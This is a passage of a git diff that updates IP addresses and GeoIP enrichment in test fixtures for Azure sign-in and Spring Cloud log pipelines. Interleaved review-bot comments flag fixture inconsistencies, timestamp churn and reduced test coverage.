a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-service-principal.log-expected.json b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-service-principal.log-expected.json index 1b333b4bfbf..7bb15bff40d 100644 --- a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-service-principal.log-expected.json +++ b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-service-principal.log-expected.json 
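Review bot: The `+` line swaps `callerIpAddress` and `properties.ipAddress` to 81.2.69.144 but leaves Azure's own `location` / `properties.location` at DE / Hannover, while the regenerated expected output in the next file resolves that address to GB / Abingdon, so a single fixture sign-in now reports two different countries. That is fine for exercising the geoip processor, but it is exactly the kind of thing a later contributor "corrects" in the wrong direction; a one-line remark in the PR description, or an address from the supported subset whose GeoIP result matches the embedded location if one exists, would remove the ambiguity. The rewritten record also still carries `\ No newline at end of file`; adding the trailing newline while the line is being rewritten costs nothing.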
@@ -7,15 +7,24 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "country_name": "France",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": 2.3387,
- "lat": 48.8582
- },
- "country_iso_code": "FR"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
+ },
+ "as": {
+ "number": 20712,
+ "organization": {
+ "name": "Andrews \u0026 Arnold Ltd"
+ }
 },
- "address": "11.22.33.44",
- "ip": "11.22.33.44"
+ "address": "81.2.69.144",
+ "ip": "81.2.69.144"
 },
 "tags": [
 "preserve_original_event"
@@ -38,16 +47,16 @@ }, "related": { "ip": [ - "11.22.33.44" + "81.2.69.144" ] }, "client": { - "ip": "11.22.33.44" + "ip": "81.2.69.144" }, "event": { "duration": 0, - "ingested": "2021-09-28T19:32:37.460479700Z", - "original": "{\"Level\":4,\"callerIpAddress\":\"11.22.33.44\",\"category\":\"ServicePrincipalSignInLogs\",\"correlationId\":\"22222222-ece3-41ca-8e0d-1f1e1d8ac81a\",\"durationMs\":0,\"location\":\"DE\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appId\":\"22222222-ddf2-4ab6-b25f-f23d5d614338\",\"correlationId\":\"22222222-ece3-41ca-8e0d-1f1e1d8ac81a\",\"createdDateTime\":\"2021-07-30T11:29:26.6733668+00:00\",\"crossTenantAccessType\":\"none\",\"flaggedForReview\":false,\"id\":\"22222222-5ec0-4795-bf9f-9017bcc32f00\",\"ipAddress\":\"11.22.33.44\",\"isInteractive\":false,\"isTenantRestricted\":false,\"location\":{\"city\":\"Hannover\",\"countryOrRegion\":\"DE\",\"geoCoordinates\":{\"latitude\":50.12345678912345,\"longitude\":9.123456789012345},\"state\":\"Niedersachsen\"},\"processingTimeInMilliseconds\":0,\"resourceDisplayName\":\"Configuration Manager Microservice\",\"resourceId\":\"22222222-c916-4293-8373-d584996f60ae\",\"riskDetail\":\"none\",\"riskLevelAggregated\":\"low\",\"riskLevelDuringSignIn\":\"low\",\"riskState\":\"none\",\"servicePrincipalId\":\"22222222-4677-43b4-a1dc-ecb3230e9350\",\"servicePrincipalName\":\"ConfigMgrSvc_22222222-dfb4-4070-ad95-cf1e68280bb0\",\"status\":{\"errorCode\":7000222},\"tokenIssuerType\":\"AzureAD\",\"userId\":null},\"resourceId\":\"/tenants/1111111111-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"7000222\",\"tenantId\":\"1111111111-902d-4dea-8026-5a790862fede\",\"time\":\"2021-07-30T11:29:26.6733668Z\"}", + "ingested": "2021-12-09T13:30:59.521517Z", + "original": 
"{\"Level\":4,\"callerIpAddress\":\"81.2.69.144\",\"category\":\"ServicePrincipalSignInLogs\",\"correlationId\":\"22222222-ece3-41ca-8e0d-1f1e1d8ac81a\",\"durationMs\":0,\"location\":\"DE\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appId\":\"22222222-ddf2-4ab6-b25f-f23d5d614338\",\"correlationId\":\"22222222-ece3-41ca-8e0d-1f1e1d8ac81a\",\"createdDateTime\":\"2021-07-30T11:29:26.6733668+00:00\",\"crossTenantAccessType\":\"none\",\"flaggedForReview\":false,\"id\":\"22222222-5ec0-4795-bf9f-9017bcc32f00\",\"ipAddress\":\"81.2.69.144\",\"isInteractive\":false,\"isTenantRestricted\":false,\"location\":{\"city\":\"Hannover\",\"countryOrRegion\":\"DE\",\"geoCoordinates\":{\"latitude\":50.12345678912345,\"longitude\":9.123456789012345},\"state\":\"Niedersachsen\"},\"processingTimeInMilliseconds\":0,\"resourceDisplayName\":\"Configuration Manager Microservice\",\"resourceId\":\"22222222-c916-4293-8373-d584996f60ae\",\"riskDetail\":\"none\",\"riskLevelAggregated\":\"low\",\"riskLevelDuringSignIn\":\"low\",\"riskState\":\"none\",\"servicePrincipalId\":\"22222222-4677-43b4-a1dc-ecb3230e9350\",\"servicePrincipalName\":\"ConfigMgrSvc_22222222-dfb4-4070-ad95-cf1e68280bb0\",\"status\":{\"errorCode\":7000222},\"tokenIssuerType\":\"AzureAD\",\"userId\":null},\"resourceId\":\"/tenants/1111111111-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"7000222\",\"tenantId\":\"1111111111-902d-4dea-8026-5a790862fede\",\"time\":\"2021-07-30T11:29:26.6733668Z\"}", "kind": "event", "action": "Sign-in activity", "id": "22222222-5ec0-4795-bf9f-9017bcc32f00", diff --git a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-signinlogs-raw.log b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-signinlogs-raw.log index 04d29250a6f..6003b0ce3fa 100644 --- a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-signinlogs-raw.log 
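Review bot: `event.ingested` is re-pinned to a fresh wall-clock value in this hunk (`"ingested": "2021-12-09T13:30:59.521517Z"`), and the same churn appears in both hunks of test-signinlogs-raw.log-expected.json and in the springcloudlogs expected file, although none of those lines is part of the IP change. If the pipeline test config already treats `event.ingested` as a dynamic field (which a passing test would imply; the config is not visible here) these lines are pure diff noise, and if it does not, the comparison can only pass on the machine that regenerated the file. Either declaring the field dynamic or dropping the timestamp lines from this PR would leave the diff showing only the address and geo changes.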
+++ b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-signinlogs-raw.log 
@@ -1,2 +1,2 @@ -{"Level":"4","callerIpAddress":"1.1.1.1","category":"SignInLogs","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"1.1.1.1","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"test@elastic.co"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"} -{"Level":"4","callerIpAddress":"8.8.8.8","category":"SignInLogs","correlationId":"a8d4eb85-90c5-740d-9af6-7a15036cd135","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 
365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"8.8.8.8","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"c3813493-bf92-5123-2717-8a8b2979c38b"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"} \ No newline at end of file +{"Level":"4","callerIpAddress":"81.2.69.144","category":"SignInLogs","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 
77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"81.2.69.144","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"test@elastic.co"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"} +{"Level":"4","callerIpAddress":"81.2.69.144","category":"SignInLogs","correlationId":"a8d4eb85-90c5-740d-9af6-7a15036cd135","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 
77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"81.2.69.144","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"c3813493-bf92-5123-2717-8a8b2979c38b"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"} \ No newline at end of file diff --git a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-signinlogs-raw.log-expected.json b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-signinlogs-raw.log-expected.json index 54a103981d1..8dfb4154a46 100644 --- a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-signinlogs-raw.log-expected.json +++ b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-signinlogs-raw.log-expected.json 
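Review bot: Both records in test-signinlogs-raw.log now carry the same address, 81.2.69.144, where the old fixture used two distinct ones, so the two expected events in test-signinlogs-raw.log-expected.json (the hunks at `@@ -6,22` and `@@ -126,22`) end up with identical `source.geo`, `source.as` and `related.ip` content. The fixture thereby stops demonstrating that per-event enrichment follows its own input, and a pipeline regression that copied enrichment across events would no longer be caught. Using a second address from the supported subset for the second record keeps the coverage the old fixture had. The `+` lines also still end with `\ No newline at end of file`.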
@@ -6,22 +6,25 @@
 },
 "source": {
 "geo": {
- "continent_name": "Oceania",
- "country_name": "Australia",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": 143.2104,
- "lat": -33.494
- },
- "country_iso_code": "AU"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 13335,
+ "number": 20712,
 "organization": {
- "name": "Cloudflare, Inc."
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "1.1.1.1",
- "ip": "1.1.1.1"
+ "address": "81.2.69.144",
+ "ip": "81.2.69.144"
 },
 "message": "This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.",
 "tags": [
@@ -45,16 +48,16 @@ }, "related": { "ip": [ - "1.1.1.1" + "81.2.69.144" ] }, "client": { - "ip": "1.1.1.1" + "ip": "81.2.69.144" }, "event": { "duration": 0, - "ingested": "2021-09-28T19:32:37.721058600Z", - "original": "{\"Level\":\"4\",\"callerIpAddress\":\"1.1.1.1\",\"category\":\"SignInLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"1.1.1.1\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"test@elastic.co\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was 
signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}", + "ingested": "2021-12-09T13:30:59.716497500Z", + "original": "{\"Level\":\"4\",\"callerIpAddress\":\"81.2.69.144\",\"category\":\"SignInLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"81.2.69.144\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"test@elastic.co\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was 
signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}",
 "kind": "event",
 "action": "Sign-in activity",
 "id": "8a4de8b5-095c-47d0-a96f-a75130c61d53",
@@ -126,22 +129,25 @@
 },
 "source": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
- "ip": "8.8.8.8"
+ "address": "81.2.69.144",
+ "ip": "81.2.69.144"
 },
 "message": "This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.",
 "tags": [
@@ -165,16 +171,16 @@ }, "related": { "ip": [ - "8.8.8.8" + "81.2.69.144" ] }, "client": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "event": { "duration": 0, - "ingested": "2021-09-28T19:32:37.721325100Z", - "original": "{\"Level\":\"4\",\"callerIpAddress\":\"8.8.8.8\",\"category\":\"SignInLogs\",\"correlationId\":\"a8d4eb85-90c5-740d-9af6-7a15036cd135\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"8.8.8.8\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"c3813493-bf92-5123-2717-8a8b2979c38b\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was 
signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}", + "ingested": "2021-12-09T13:30:59.716506200Z", + "original": "{\"Level\":\"4\",\"callerIpAddress\":\"81.2.69.144\",\"category\":\"SignInLogs\",\"correlationId\":\"a8d4eb85-90c5-740d-9af6-7a15036cd135\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"81.2.69.144\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"c3813493-bf92-5123-2717-8a8b2979c38b\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was 
signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}", "kind": "event", "action": "Sign-in activity", "id": "8a4de8b5-095c-47d0-a96f-a75130c61d53", diff --git a/packages/azure/data_stream/springcloudlogs/_dev/test/pipeline/test-springcloudlogs-raw.log-expected.json b/packages/azure/data_stream/springcloudlogs/_dev/test/pipeline/test-springcloudlogs-raw.log-expected.json index ca895903f26..a411804ae1a 100644 --- a/packages/azure/data_stream/springcloudlogs/_dev/test/pipeline/test-springcloudlogs-raw.log-expected.json +++ b/packages/azure/data_stream/springcloudlogs/_dev/test/pipeline/test-springcloudlogs-raw.log-expected.json 
@@ -1,50 +1,51 @@
 {
 "expected": [
 {
- "@timestamp": "2021-07-01T19:30:30.535Z",
- "azure": {
- "resource": {
- "group": "SA-HEMANT",
- "id": "/SUBSCRIPTIONS/EDD63B67-0BA2-4837-A4EB-CD484E9FF623/RESOURCEGROUPS/SA-HEMANT/PROVIDERS/MICROSOFT.APPPLATFORM/SPRING/HM-SC-PETCLINIC",
- "name": "HM-SC-PETCLINIC",
- "provider": "MICROSOFT.APPPLATFORM/SPRING"
- },
- "springcloudlogs": {
- "category": "ApplicationConsole",
- "event_category": "Administrative",
- "log_format": "RAW",
- "operation_name": "Microsoft.AppPlatform/Spring/logs",
- "properties": {
- "app_name": "admin-server",
- "instance_name": "admin-server-default-12-8459d44f68-g4b5f",
- "service_id": "c41fd000b1a5450eb234039376da26de",
- "service_name": "hm-sc-petclinic",
- "stream": "stdout"
- }
- },
- "subscription_id": "EDD63B67-0BA2-4837-A4EB-CD484E9FF623"
+ "geo": {
+ "name": "westus2"
 },
 "cloud": {
 "provider": "azure"
 },
+ "@timestamp": "2021-07-01T19:30:30.535Z",
 "ecs": {
 "version": "1.10.0"
 },
- "event": {
- "action": "Microsoft.AppPlatform/Spring/logs",
- "kind": "event",
- "original": "{ \"time\": \"2021-07-01T19:30:30.535404056Z\", \"LogFormat\": \"RAW\", \"resourceId\": \"/SUBSCRIPTIONS/EDD63B67-0BA2-4837-A4EB-CD484E9FF623/RESOURCEGROUPS/SA-HEMANT/PROVIDERS/MICROSOFT.APPPLATFORM/SPRING/HM-SC-PETCLINIC\", \"operationName\": \"Microsoft.AppPlatform/Spring/logs\", \"category\": \"ApplicationConsole\", \"level\": \"Informational\", \"location\": \"westus2\", \"properties\": {\"Log\":\"2021-07-01 19:30:30.535 INFO 1 --- [oundedElastic-9] c.c.c.ConfigServicePropertySourceLocator : Located environment: name=admin-server, profiles=[mysql], label=null, version=638a1af7fc8d331d7eb26a571275e954632717e8, state=null\\n\",\"Stream\":\"stdout\",\"AppName\":\"admin-server\",\"InstanceName\":\"admin-server-default-12-8459d44f68-g4b5f\",\"ServiceId\":\"c41fd000b1a5450eb234039376da26de\",\"ServiceName\":\"hm-sc-petclinic\"}}"
- },
- "geo": {
- "name": "westus2"
- },
 "log": {
 "level": "Informational"
 },
+ "event": {
+ "action": "Microsoft.AppPlatform/Spring/logs",
+ "ingested": "2021-12-09T13:31:00.534484200Z",
+ "original": "{ \"time\": \"2021-07-01T19:30:30.535404056Z\", \"LogFormat\": \"RAW\", \"resourceId\": \"/SUBSCRIPTIONS/EDD63B67-0BA2-4837-A4EB-CD484E9FF623/RESOURCEGROUPS/SA-HEMANT/PROVIDERS/MICROSOFT.APPPLATFORM/SPRING/HM-SC-PETCLINIC\", \"operationName\": \"Microsoft.AppPlatform/Spring/logs\", \"category\": \"ApplicationConsole\", \"level\": \"Informational\", \"location\": \"westus2\", \"properties\": {\"Log\":\"2021-07-01 19:30:30.535 INFO 1 --- [oundedElastic-9] c.c.c.ConfigServicePropertySourceLocator : Located environment: name=admin-server, profiles=[mysql], label=null, version=638a1af7fc8d331d7eb26a571275e954632717e8, state=null\\n\",\"Stream\":\"stdout\",\"AppName\":\"admin-server\",\"InstanceName\":\"admin-server-default-12-8459d44f68-g4b5f\",\"ServiceId\":\"c41fd000b1a5450eb234039376da26de\",\"ServiceName\":\"hm-sc-petclinic\"}}",
+ "kind": "event"
+ },
 "message": "2021-07-01 19:30:30.535 INFO 1 --- [oundedElastic-9] c.c.c.ConfigServicePropertySourceLocator : Located environment: name=admin-server, profiles=[mysql], label=null, version=638a1af7fc8d331d7eb26a571275e954632717e8, state=null\n",
 "tags": [
 "preserve_original_event"
- ]
+ ],
+ "azure": {
+ "subscription_id": "EDD63B67-0BA2-4837-A4EB-CD484E9FF623",
+ "resource": {
+ "name": "HM-SC-PETCLINIC",
